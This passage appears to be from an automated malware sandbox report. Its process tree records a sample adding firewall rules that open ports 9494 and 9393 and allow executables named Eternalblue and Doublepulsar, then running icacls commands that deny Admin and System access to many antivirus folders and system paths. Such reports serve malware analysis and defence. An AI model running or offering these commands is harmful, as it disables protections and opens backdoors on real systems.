      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      PID:7032
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      PID:7160
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      System Location Discovery: System Language Discovery
      PID:5792
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      PID:6456
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      System Location Discovery: System Language Discovery
      PID:5728
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      PID:6640
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:6200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      PID:6196
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      System Location Discovery: System Language Discovery
      PID:7080
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:7008
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:6948
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:7120
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:5312
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:7100
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:4752
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:632
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:6420
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6328
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5212
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3348
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      PID:6396
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6744
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:1952
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:7004
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6748
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      PID:1160
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5164
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3196
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:2524
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
      4⤵
      PID:460
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny Admin:(F)
        5⤵
        Modifies file permissions
        
        PID:6920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:6664
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:7140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
      4⤵
      PID:4852
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny Admin:(F)
        5⤵
        Modifies file permissions
        
        PID:6936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:1628
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:6632
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6804
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:7076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6876
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:4752
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6160
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6344
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5436
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:1240
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6188
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:3640
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6300
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:5780
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6984
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:3568
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:4000
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:7060
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7032
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:4148
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6324
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6376
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1240
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6856
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:7124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:3220
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1424
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6724
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2104
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6688
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6288
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2384
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5020
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:5608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6444
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6636
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:2636
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6476
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6436
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:3536
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6996
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5780
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:2068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:6528
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6984
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6276
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6640
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1720
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:7144
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6632
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:4752
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7088
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6432
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:3640
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5376
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2104
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6200
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:6832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6600
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2524
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6804
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2088
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:4768
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:6500
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3436
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:1156
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:1484
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6728
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6272
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6460
